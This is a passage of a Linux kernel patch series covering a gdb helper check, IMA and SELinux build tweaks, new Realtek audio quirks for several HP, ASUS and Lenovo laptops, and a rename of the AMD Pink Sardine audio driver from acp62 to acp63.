+ 
+ def read_u16(buffer, offset):
+diff --git a/scripts/gdb/vmlinux-gdb.py b/scripts/gdb/vmlinux-gdb.py
+index 3e8d3669f0ce0..5564ffe8ae327 100644
+--- a/scripts/gdb/vmlinux-gdb.py
++++ b/scripts/gdb/vmlinux-gdb.py
+@@ -22,6 +22,10 @@ except:
+     gdb.write("NOTE: gdb 7.2 or later required for Linux helper scripts to "
+               "work.\n")
+ else:
++    import linux.constants
++    if linux.constants.LX_CONFIG_DEBUG_INFO_REDUCED:
++        raise gdb.GdbError("Reduced debug information will prevent GDB "
++                           "from having complete types.\n")
+     import linux.utils
+     import linux.symbols
+     import linux.modules
+@@ -32,7 +36,6 @@ else:
+     import linux.lists
+     import linux.rbtree
+     import linux.proc
+-    import linux.constants
+     import linux.timerlist
+     import linux.clk
+     import linux.genpd
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 39caeca474449..60a511c6b583e 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -8,7 +8,7 @@ config IMA
+ 	select CRYPTO_HMAC
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_HASH_INFO
+-	select TCG_TPM if HAS_IOMEM && !UML
++	select TCG_TPM if HAS_IOMEM
+ 	select TCG_TIS if TCG_TPM && X86
+ 	select TCG_CRB if TCG_TPM && ACPI
+ 	select TCG_IBMVTPM if TCG_TPM && PPC_PSERIES
+diff --git a/security/selinux/Makefile b/security/selinux/Makefile
+index 7761624448826..0aecf9334ec31 100644
+--- a/security/selinux/Makefile
++++ b/security/selinux/Makefile
+@@ -23,8 +23,8 @@ ccflags-y := -I$(srctree)/security/selinux -I$(srctree)/security/selinux/include
+ $(addprefix $(obj)/,$(selinux-y)): $(obj)/flask.h
+ 
+ quiet_cmd_flask = GEN     $(obj)/flask.h $(obj)/av_permissions.h
+-      cmd_flask = scripts/selinux/genheaders/genheaders $(obj)/flask.h $(obj)/av_permissions.h
++      cmd_flask = $< $(obj)/flask.h $(obj)/av_permissions.h
+ 
+ targets += flask.h av_permissions.h
+-$(obj)/flask.h: $(src)/include/classmap.h FORCE
++$(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/genheaders/genheaders FORCE
+ 	$(call if_changed,flask)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f70d6a33421d2..172ffc2c332b7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9428,6 +9428,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8898, "HP EliteBook 845 G8 Notebook PC", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x88d0, "HP Pavilion 15-eh1xxx (mainboard 88D0)", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8902, "HP OMEN 16", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x8919, "HP Pavilion Aero Laptop 13-be0xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896d, "HP ZBook Firefly 16 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896e, "HP EliteBook x360 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8971, "HP EliteBook 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9478,6 +9479,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+@@ -9500,6 +9502,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1740, "ASUS UX430UA", ALC295_FIXUP_ASUS_DACS),
+@@ -9689,6 +9692,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+diff --git a/sound/soc/amd/Kconfig b/sound/soc/amd/Kconfig
+index 150786279257d..c88ebd84bdd50 100644
+--- a/sound/soc/amd/Kconfig
++++ b/sound/soc/amd/Kconfig
+@@ -129,10 +129,10 @@ config SND_SOC_AMD_RPL_ACP6x
+           If unsure select "N".
+ 
+ config SND_SOC_AMD_PS
+-        tristate "AMD Audio Coprocessor-v6.2 Pink Sardine support"
++        tristate "AMD Audio Coprocessor-v6.3 Pink Sardine support"
+         depends on X86 && PCI && ACPI
+         help
+-          This option enables Audio Coprocessor i.e ACP v6.2 support on
++          This option enables Audio Coprocessor i.e ACP v6.3 support on
+           AMD Pink sardine platform. By enabling this flag build will be
+           triggered for ACP PCI driver, ACP PDM DMA driver.
+           Say m if you have such a device.
+diff --git a/sound/soc/amd/ps/acp62.h b/sound/soc/amd/ps/acp62.h
+deleted file mode 100644
+index 8b30aefa4cd05..0000000000000
+--- a/sound/soc/amd/ps/acp62.h
++++ /dev/null
+@@ -1,98 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * AMD ALSA SoC PDM Driver
+- *
+- * Copyright (C) 2022 Advanced Micro Devices, Inc. All rights reserved.
+- */
+-
+-#include <sound/acp62_chip_offset_byte.h>
+-
+-#define ACP_DEVICE_ID 0x15E2
+-#define ACP6x_REG_START		0x1240000
+-#define ACP6x_REG_END		0x1250200
+-#define ACP6x_DEVS		3
+-#define ACP6x_PDM_MODE		1
+-
+-#define ACP_SOFT_RESET_SOFTRESET_AUDDONE_MASK	0x00010001
+-#define ACP_PGFSM_CNTL_POWER_ON_MASK	1
+-#define ACP_PGFSM_CNTL_POWER_OFF_MASK	0
+-#define ACP_PGFSM_STATUS_MASK		3
+-#define ACP_POWERED_ON			0
+-#define ACP_POWER_ON_IN_PROGRESS	1
+-#define ACP_POWERED_OFF		2
+-#define ACP_POWER_OFF_IN_PROGRESS	3
+-
+-#define ACP_ERROR_MASK 0x20000000
+-#define ACP_EXT_INTR_STAT_CLEAR_MASK 0xFFFFFFFF
+-#define PDM_DMA_STAT 0x10
+-
+-#define PDM_DMA_INTR_MASK	0x10000
+-#define ACP_ERROR_STAT	29
+-#define PDM_DECIMATION_FACTOR	2
+-#define ACP_PDM_CLK_FREQ_MASK	7
+-#define ACP_WOV_MISC_CTRL_MASK	0x10
+-#define ACP_PDM_ENABLE		1
+-#define ACP_PDM_DISABLE		0
+-#define ACP_PDM_DMA_EN_STATUS	2
+-#define TWO_CH		2
+-#define DELAY_US	5
+-#define ACP_COUNTER	20000
+-
+-#define ACP_SRAM_PTE_OFFSET	0x03800000
+-#define PAGE_SIZE_4K_ENABLE	2
+-#define PDM_PTE_OFFSET		0
+-#define PDM_MEM_WINDOW_START	0x4000000
+-
+-#define CAPTURE_MIN_NUM_PERIODS     4
+-#define CAPTURE_MAX_NUM_PERIODS     4
+-#define CAPTURE_MAX_PERIOD_SIZE     8192
+-#define CAPTURE_MIN_PERIOD_SIZE     4096
+-
+-#define MAX_BUFFER (CAPTURE_MAX_PERIOD_SIZE * CAPTURE_MAX_NUM_PERIODS)
+-#define MIN_BUFFER MAX_BUFFER
+-
+-/* time in ms for runtime suspend delay */
+-#define ACP_SUSPEND_DELAY_MS	2000
+-
+-enum acp_config {
+-	ACP_CONFIG_0 = 0,
+-	ACP_CONFIG_1,
+-	ACP_CONFIG_2,
+-	ACP_CONFIG_3,
+-	ACP_CONFIG_4,
+-	ACP_CONFIG_5,
+-	ACP_CONFIG_6,
+-	ACP_CONFIG_7,
+-	ACP_CONFIG_8,
+-	ACP_CONFIG_9,
+-	ACP_CONFIG_10,
+-	ACP_CONFIG_11,
+-	ACP_CONFIG_12,
+-	ACP_CONFIG_13,
+-	ACP_CONFIG_14,
+-	ACP_CONFIG_15,
+-};
+-
+-struct pdm_stream_instance {
+-	u16 num_pages;
+-	u16 channels;
+-	dma_addr_t dma_addr;
+-	u64 bytescount;
+-	void __iomem *acp62_base;
+-};
+-
+-struct pdm_dev_data {
+-	u32 pdm_irq;
+-	void __iomem *acp62_base;
+-	struct snd_pcm_substream *capture_stream;
+-};
+-
+-static inline u32 acp62_readl(void __iomem *base_addr)
+-{
+-	return readl(base_addr);
+-}
+-
+-static inline void acp62_writel(u32 val, void __iomem *base_addr)
+-{
+-	writel(val, base_addr);
+-}
+diff --git a/sound/soc/amd/ps/acp63.h b/sound/soc/amd/ps/acp63.h
+new file mode 100644
+index 0000000000000..85f869c2229f5
+--- /dev/null
++++ b/sound/soc/amd/ps/acp63.h
+@@ -0,0 +1,98 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * AMD ALSA SoC PDM Driver
++ *
++ * Copyright (C) 2022 Advanced Micro Devices, Inc. All rights reserved.
++ */
++
++#include <sound/acp63_chip_offset_byte.h>
++
++#define ACP_DEVICE_ID 0x15E2
++#define ACP6x_REG_START		0x1240000
++#define ACP6x_REG_END		0x1250200
++#define ACP6x_DEVS		3
++#define ACP6x_PDM_MODE		1
++
++#define ACP_SOFT_RESET_SOFTRESET_AUDDONE_MASK	0x00010001
++#define ACP_PGFSM_CNTL_POWER_ON_MASK	1
++#define ACP_PGFSM_CNTL_POWER_OFF_MASK	0
++#define ACP_PGFSM_STATUS_MASK		3
++#define ACP_POWERED_ON			0
++#define ACP_POWER_ON_IN_PROGRESS	1
++#define ACP_POWERED_OFF		2
++#define ACP_POWER_OFF_IN_PROGRESS	3
++
++#define ACP_ERROR_MASK 0x20000000
++#define ACP_EXT_INTR_STAT_CLEAR_MASK 0xFFFFFFFF
++#define PDM_DMA_STAT 0x10
++
++#define PDM_DMA_INTR_MASK	0x10000
++#define ACP_ERROR_STAT	29
++#define PDM_DECIMATION_FACTOR	2
++#define ACP_PDM_CLK_FREQ_MASK	7
++#define ACP_WOV_MISC_CTRL_MASK	0x10
++#define ACP_PDM_ENABLE		1
++#define ACP_PDM_DISABLE		0
++#define ACP_PDM_DMA_EN_STATUS	2
++#define TWO_CH		2
++#define DELAY_US	5
++#define ACP_COUNTER	20000
++
++#define ACP_SRAM_PTE_OFFSET	0x03800000
++#define PAGE_SIZE_4K_ENABLE	2
++#define PDM_PTE_OFFSET		0
++#define PDM_MEM_WINDOW_START	0x4000000
++
++#define CAPTURE_MIN_NUM_PERIODS     4
++#define CAPTURE_MAX_NUM_PERIODS     4
++#define CAPTURE_MAX_PERIOD_SIZE     8192
++#define CAPTURE_MIN_PERIOD_SIZE     4096
++
++#define MAX_BUFFER (CAPTURE_MAX_PERIOD_SIZE * CAPTURE_MAX_NUM_PERIODS)
++#define MIN_BUFFER MAX_BUFFER
++
++/* time in ms for runtime suspend delay */
++#define ACP_SUSPEND_DELAY_MS	2000
++
++enum acp_config {
++	ACP_CONFIG_0 = 0,
++	ACP_CONFIG_1,
++	ACP_CONFIG_2,
++	ACP_CONFIG_3,
++	ACP_CONFIG_4,
++	ACP_CONFIG_5,
++	ACP_CONFIG_6,
++	ACP_CONFIG_7,
++	ACP_CONFIG_8,
++	ACP_CONFIG_9,
++	ACP_CONFIG_10,
++	ACP_CONFIG_11,
++	ACP_CONFIG_12,
++	ACP_CONFIG_13,
++	ACP_CONFIG_14,
++	ACP_CONFIG_15,
++};
++
++struct pdm_stream_instance {
++	u16 num_pages;
++	u16 channels;
++	dma_addr_t dma_addr;
++	u64 bytescount;
++	void __iomem *acp63_base;
++};
++
++struct pdm_dev_data {
++	u32 pdm_irq;
++	void __iomem *acp63_base;
++	struct snd_pcm_substream *capture_stream;
++};
++
++static inline u32 acp63_readl(void __iomem *base_addr)
++{
++	return readl(base_addr);
++}
++
++static inline void acp63_writel(u32 val, void __iomem *base_addr)
++{
++	writel(val, base_addr);
++}
+diff --git a/sound/soc/amd/ps/pci-ps.c b/sound/soc/amd/ps/pci-ps.c
+index dff2e2376bbf9..7c9751a7eedc2 100644
+--- a/sound/soc/amd/ps/pci-ps.c
++++ b/sound/soc/amd/ps/pci-ps.c
+@@ -15,30 +15,30 @@
+ #include <sound/pcm_params.h>
+ #include <linux/pm_runtime.h>
+ 
+-#include "acp62.h"
++#include "acp63.h"
+ 
+-struct acp62_dev_data {
+-	void __iomem *acp62_base;
++struct acp63_dev_data {
++	void __iomem *acp63_base;
+ 	struct resource *res;
+-	bool acp62_audio_mode;
++	bool acp63_audio_mode;
+ 	struct platform_device *pdev[ACP6x_DEVS];
+ };
+ 
+-static int acp62_power_on(void __iomem *acp_base)
++static int acp63_power_on(void __iomem *acp_base)
+ {
+ 	u32 val;
+ 	int timeout;
+ 
+-	val = acp62_readl(acp_base + ACP_PGFSM_STATUS);
++	val = acp63_readl(acp_base + ACP_PGFSM_STATUS);
+ 
+ 	if (!val)
+ 		return val;
+ 
+ 	if ((val & ACP_PGFSM_STATUS_MASK) != ACP_POWER_ON_IN_PROGRESS)
+-		acp62_writel(ACP_PGFSM_CNTL_POWER_ON_MASK, acp_base + ACP_PGFSM_CONTROL);
++		acp63_writel(ACP_PGFSM_CNTL_POWER_ON_MASK, acp_base + ACP_PGFSM_CONTROL);
+ 	timeout = 0;
+ 	while (++timeout < 500) {
+-		val = acp62_readl(acp_base + ACP_PGFSM_STATUS);
++		val = acp63_readl(acp_base + ACP_PGFSM_STATUS);
+ 		if (!val)
+ 			return 0;
+ 		udelay(1);
+@@ -46,23 +46,23 @@ static int acp62_power_on(void __iomem *acp_base)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static int acp62_reset(void __iomem *acp_base)
++static int acp63_reset(void __iomem *acp_base)
+ {
+ 	u32 val;
+ 	int timeout;
+ 
+-	acp62_writel(1, acp_base + ACP_SOFT_RESET);
++	acp63_writel(1, acp_base + ACP_SOFT_RESET);
+ 	timeout = 0;
+ 	while (++timeout < 500) {
+-		val = acp62_readl(acp_base + ACP_SOFT_RESET);
++		val = acp63_readl(acp_base + ACP_SOFT_RESET);
+ 		if (val & ACP_SOFT_RESET_SOFTRESET_AUDDONE_MASK)
+ 			break;
+ 		cpu_relax();
+ 	}
+-	acp62_writel(0, acp_base + ACP_SOFT_RESET);
++	acp63_writel(0, acp_base + ACP_SOFT_RESET);
+ 	timeout = 0;
+ 	while (++timeout < 500) {
+-		val = acp62_readl(acp_base + ACP_SOFT_RESET);
++		val = acp63_readl(acp_base + ACP_SOFT_RESET);
+ 		if (!val)
+ 			return 0;
+ 		cpu_relax();
+@@ -70,57 +70,55 @@ static int acp62_reset(void __iomem *acp_base)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static void acp62_enable_interrupts(void __iomem *acp_base)
++static void acp63_enable_interrupts(void __iomem *acp_base)
+ {
+-	acp62_writel(1, acp_base + ACP_EXTERNAL_INTR_ENB);
++	acp63_writel(1, acp_base + ACP_EXTERNAL_INTR_ENB);
+ }
+ 
+-static void acp62_disable_interrupts(void __iomem *acp_base)
++static void acp63_disable_interrupts(void __iomem *acp_base)
+ {
+-	acp62_writel(ACP_EXT_INTR_STAT_CLEAR_MASK, acp_base +
++	acp63_writel(ACP_EXT_INTR_STAT_CLEAR_MASK, acp_base +
+ 		     ACP_EXTERNAL_INTR_STAT);
+-	acp62_writel(0, acp_base + ACP_EXTERNAL_INTR_CNTL);
+-	acp62_writel(0, acp_base + ACP_EXTERNAL_INTR_ENB);
++	acp63_writel(0, acp_base + ACP_EXTERNAL_INTR_CNTL);
++	acp63_writel(0, acp_base + ACP_EXTERNAL_INTR_ENB);
+ }
+ 
+-static int acp62_init(void __iomem *acp_base, struct device *dev)
++static int acp63_init(void __iomem *acp_base, struct device *dev)
+ {
+ 	int ret;
+ 
+-	ret = acp62_power_on(acp_base);
++	ret = acp63_power_on(acp_base);
+ 	if (ret) {
+ 		dev_err(dev, "ACP power on failed\n");
+ 		return ret;
+ 	}
+-	acp62_writel(0x01, acp_base + ACP_CONTROL);
+-	ret = acp62_reset(acp_base);
++	acp63_writel(0x01, acp_base + ACP_CONTROL);
++	ret = acp63_reset(acp_base);
+ 	if (ret) {
+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp62_writel(0x03, acp_base + ACP_CLKMUX_SEL);
+-	acp62_enable_interrupts(acp_base);
++	acp63_enable_interrupts(acp_base);
+ 	return 0;
+ }
+ 
+-static int acp62_deinit(void __iomem *acp_base, struct device *dev)
++static int acp63_deinit(void __iomem *acp_base, struct device *dev)
+ {
+ 	int ret;
+ 
+-	acp62_disable_interrupts(acp_base);
+-	ret = acp62_reset(acp_base);
++	acp63_disable_interrupts(acp_base);
++	ret = acp63_reset(acp_base);
+ 	if (ret) {
+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp62_writel(0, acp_base + ACP_CLKMUX_SEL);
+-	acp62_writel(0, acp_base + ACP_CONTROL);
++	acp63_writel(0, acp_base + ACP_CONTROL);
+ 	return 0;
+ }
+ 
+-static irqreturn_t acp62_irq_handler(int irq, void *dev_id)
++static irqreturn_t acp63_irq_handler(int irq, void *dev_id)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	struct pdm_dev_data *ps_pdm_data;
+ 	u32 val;
+ 
+@@ -128,10 +126,10 @@ static irqreturn_t acp62_irq_handler(int irq, void *dev_id)
+ 	if (!adata)
+ 		return IRQ_NONE;
+ 
+-	val = acp62_readl(adata->acp62_base + ACP_EXTERNAL_INTR_STAT);
++	val = acp63_readl(adata->acp63_base + ACP_EXTERNAL_INTR_STAT);
+ 	if (val & BIT(PDM_DMA_STAT)) {
+ 		ps_pdm_data = dev_get_drvdata(&adata->pdev[0]->dev);
+-		acp62_writel(BIT(PDM_DMA_STAT), adata->acp62_base + ACP_EXTERNAL_INTR_STAT);
++		acp63_writel(BIT(PDM_DMA_STAT), adata->acp63_base + ACP_EXTERNAL_INTR_STAT);
+ 		if (ps_pdm_data->capture_stream)
+ 			snd_pcm_period_elapsed(ps_pdm_data->capture_stream);
+ 		return IRQ_HANDLED;
+@@ -139,10 +137,10 @@ static irqreturn_t acp62_irq_handler(int irq, void *dev_id)
+ 	return IRQ_NONE;
+ }
+ 
+-static int snd_acp62_probe(struct pci_dev *pci,
++static int snd_acp63_probe(struct pci_dev *pci,
+ 			   const struct pci_device_id *pci_id)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	struct platform_device_info pdevinfo[ACP6x_DEVS];
+ 	int index, ret;
+ 	int val = 0x00;
+@@ -157,7 +155,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 	case 0x63:
+ 		break;
+ 	default:
+-		dev_dbg(&pci->dev, "acp62 pci device not found\n");
++		dev_dbg(&pci->dev, "acp63 pci device not found\n");
+ 		return -ENODEV;
+ 	}
+ 	if (pci_enable_device(pci)) {
+@@ -170,7 +168,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 		dev_err(&pci->dev, "pci_request_regions failed\n");
+ 		goto disable_pci;
+ 	}
+-	adata = devm_kzalloc(&pci->dev, sizeof(struct acp62_dev_data),
++	adata = devm_kzalloc(&pci->dev, sizeof(struct acp63_dev_data),
+ 			     GFP_KERNEL);
+ 	if (!adata) {
+ 		ret = -ENOMEM;
+@@ -178,18 +176,18 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 	}
+ 
+ 	addr = pci_resource_start(pci, 0);
+-	adata->acp62_base = devm_ioremap(&pci->dev, addr,
++	adata->acp63_base = devm_ioremap(&pci->dev, addr,
+ 					 pci_resource_len(pci, 0));
+-	if (!adata->acp62_base) {
++	if (!adata->acp63_base) {
+ 		ret = -ENOMEM;
+ 		goto release_regions;
+ 	}
+ 	pci_set_master(pci);
+ 	pci_set_drvdata(pci, adata);
+-	ret = acp62_init(adata->acp62_base, &pci->dev);
++	ret = acp63_init(adata->acp63_base, &pci->dev);
+ 	if (ret)
+ 		goto release_regions;
+-	val = acp62_readl(adata->acp62_base + ACP_PIN_CONFIG);
++	val = acp63_readl(adata->acp63_base + ACP_PIN_CONFIG);
+ 	switch (val) {
+ 	case ACP_CONFIG_0:
+ 	case ACP_CONFIG_1:
+@@ -220,7 +218,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 			adata->res->flags = IORESOURCE_MEM;
+ 			adata->res->start = addr;
+ 			adata->res->end = addr + (ACP6x_REG_END - ACP6x_REG_START);
+-			adata->acp62_audio_mode = ACP6x_PDM_MODE;
++			adata->acp63_audio_mode = ACP6x_PDM_MODE;
+ 
+ 			memset(&pdevinfo, 0, sizeof(pdevinfo));
+ 			pdevinfo[0].name = "acp_ps_pdm_dma";
+@@ -248,7 +246,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 					ret = PTR_ERR(adata->pdev[index]);
+ 					goto unregister_devs;
+ 				}
+-				ret = devm_request_irq(&pci->dev, pci->irq, acp62_irq_handler,
++				ret = devm_request_irq(&pci->dev, pci->irq, acp63_irq_handler,
+ 						       irqflags, "ACP_PCI_IRQ", adata);
+ 				if (ret) {
+ 					dev_err(&pci->dev, "ACP PCI IRQ request failed\n");
+@@ -267,7 +265,7 @@ unregister_devs:
+ 	for (--index; index >= 0; index--)
+ 		platform_device_unregister(adata->pdev[index]);
+ de_init:
+-	if (acp62_deinit(adata->acp62_base, &pci->dev))
++	if (acp63_deinit(adata->acp63_base, &pci->dev))
+ 		dev_err(&pci->dev, "ACP de-init failed\n");
+ release_regions:
+ 	pci_release_regions(pci);
+@@ -277,46 +275,46 @@ disable_pci:
+ 	return ret;
+ }
+ 
+-static int __maybe_unused snd_acp62_suspend(struct device *dev)
++static int __maybe_unused snd_acp63_suspend(struct device *dev)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	int ret;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	ret = acp62_deinit(adata->acp62_base, dev);
++	ret = acp63_deinit(adata->acp63_base, dev);
+ 	if (ret)
+ 		dev_err(dev, "ACP de-init failed\n");
+ 	return ret;
+ }
+ 
+-static int __maybe_unused snd_acp62_resume(struct device *dev)
++static int __maybe_unused snd_acp63_resume(struct device *dev)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	int ret;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	ret = acp62_init(adata->acp62_base, dev);
++	ret = acp63_init(adata->acp63_base, dev);
+ 	if (ret)
+ 		dev_err(dev, "ACP init failed\n");
+ 	return ret;
+ }
+ 
+-static const struct dev_pm_ops acp62_pm_ops = {
+-	SET_RUNTIME_PM_OPS(snd_acp62_suspend, snd_acp62_resume, NULL)
+-	SET_SYSTEM_SLEEP_PM_OPS(snd_acp62_suspend, snd_acp62_resume)
++static const struct dev_pm_ops acp63_pm_ops = {
++	SET_RUNTIME_PM_OPS(snd_acp63_suspend, snd_acp63_resume, NULL)
++	SET_SYSTEM_SLEEP_PM_OPS(snd_acp63_suspend, snd_acp63_resume)
+ };
+ 
+-static void snd_acp62_remove(struct pci_dev *pci)
++static void snd_acp63_remove(struct pci_dev *pci)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	int ret, index;
+ 
+ 	adata = pci_get_drvdata(pci);
+-	if (adata->acp62_audio_mode == ACP6x_PDM_MODE) {
++	if (adata->acp63_audio_mode == ACP6x_PDM_MODE) {
+ 		for (index = 0; index < ACP6x_DEVS; index++)
+ 			platform_device_unregister(adata->pdev[index]);
+ 	}
+-	ret = acp62_deinit(adata->acp62_base, &pci->dev);
++	ret = acp63_deinit(adata->acp63_base, &pci->dev);
+ 	if (ret)
+ 		dev_err(&pci->dev, "ACP de-init failed\n");
+ 	pm_runtime_forbid(&pci->dev);
+@@ -325,25 +323,25 @@ static void snd_acp62_remove(struct pci_dev *pci)
+ 	pci_disable_device(pci);
+ }
+ 
+-static const struct pci_device_id snd_acp62_ids[] = {
++static const struct pci_device_id snd_acp63_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, ACP_DEVICE_ID),
+ 	.class = PCI_CLASS_MULTIMEDIA_OTHER << 8,
+ 	.class_mask = 0xffffff },
+ 	{ 0, },
+ };
+-MODULE_DEVICE_TABLE(pci, snd_acp62_ids);
++MODULE_DEVICE_TABLE(pci, snd_acp63_ids);
+ 
+-static struct pci_driver ps_acp62_driver  = {
++static struct pci_driver ps_acp63_driver  = {
+ 	.name = KBUILD_MODNAME,
+-	.id_table = snd_acp62_ids,
+-	.probe = snd_acp62_probe,
+-	.remove = snd_acp62_remove,
++	.id_table = snd_acp63_ids,
++	.probe = snd_acp63_probe,
++	.remove = snd_acp63_remove,
+ 	.driver = {
+-		.pm = &acp62_pm_ops,
++		.pm = &acp63_pm_ops,
+ 	}
+ };
+ 
+-module_pci_driver(ps_acp62_driver);
++module_pci_driver(ps_acp63_driver);
+ 
+ MODULE_AUTHOR("Vijendar.Mukunda@amd.com");
+ MODULE_AUTHOR("Syed.SabaKareem@amd.com");
+diff --git a/sound/soc/amd/ps/ps-mach.c b/sound/soc/amd/ps/ps-mach.c
+index b3e97093481d2..3ffbe4fdafdfc 100644
+--- a/sound/soc/amd/ps/ps-mach.c
++++ b/sound/soc/amd/ps/ps-mach.c
+@@ -13,11 +13,11 @@
+ #include <linux/io.h>
+ #include <linux/dmi.h>
+ 
+-#include "acp62.h"
++#include "acp63.h"
+ 
+ #define DRV_NAME "acp_ps_mach"
+ 
+-SND_SOC_DAILINK_DEF(acp62_pdm,
++SND_SOC_DAILINK_DEF(acp63_pdm,
+ 		    DAILINK_COMP_ARRAY(COMP_CPU("acp_ps_pdm_dma.0")));
+ 
+ SND_SOC_DAILINK_DEF(dmic_codec,
+@@ -27,31 +27,31 @@ SND_SOC_DAILINK_DEF(dmic_codec,
+ SND_SOC_DAILINK_DEF(pdm_platform,
+ 		    DAILINK_COMP_ARRAY(COMP_PLATFORM("acp_ps_pdm_dma.0")));
+ 
+-static struct snd_soc_dai_link acp62_dai_pdm[] = {
++static struct snd_soc_dai_link acp63_dai_pdm[] = {
+ 	{
+-		.name = "acp62-dmic-capture",
++		.name = "acp63-dmic-capture",
+ 		.stream_name = "DMIC capture",
+ 		.capture_only = 1,
+-		SND_SOC_DAILINK_REG(acp62_pdm, dmic_codec, pdm_platform),
++		SND_SOC_DAILINK_REG(acp63_pdm, dmic_codec, pdm_platform),
+ 	},
+ };
+ 
+-static struct snd_soc_card acp62_card = {
+-	.name = "acp62",
++static struct snd_soc_card acp63_card = {
++	.name = "acp63",
+ 	.owner = THIS_MODULE,
+-	.dai_link = acp62_dai_pdm,
++	.dai_link = acp63_dai_pdm,
+ 	.num_links = 1,
+ };
+ 
+-static int acp62_probe(struct platform_device *pdev)
++static int acp63_probe(struct platform_device *pdev)
+ {
+-	struct acp62_pdm *machine = NULL;
++	struct acp63_pdm *machine = NULL;
+ 	struct snd_soc_card *card;
+ 	int ret;
+ 
+-	platform_set_drvdata(pdev, &acp62_card);
++	platform_set_drvdata(pdev, &acp63_card);
+ 	card = platform_get_drvdata(pdev);
+-	acp62_card.dev = &pdev->dev;
++	acp63_card.dev = &pdev->dev;
+ 
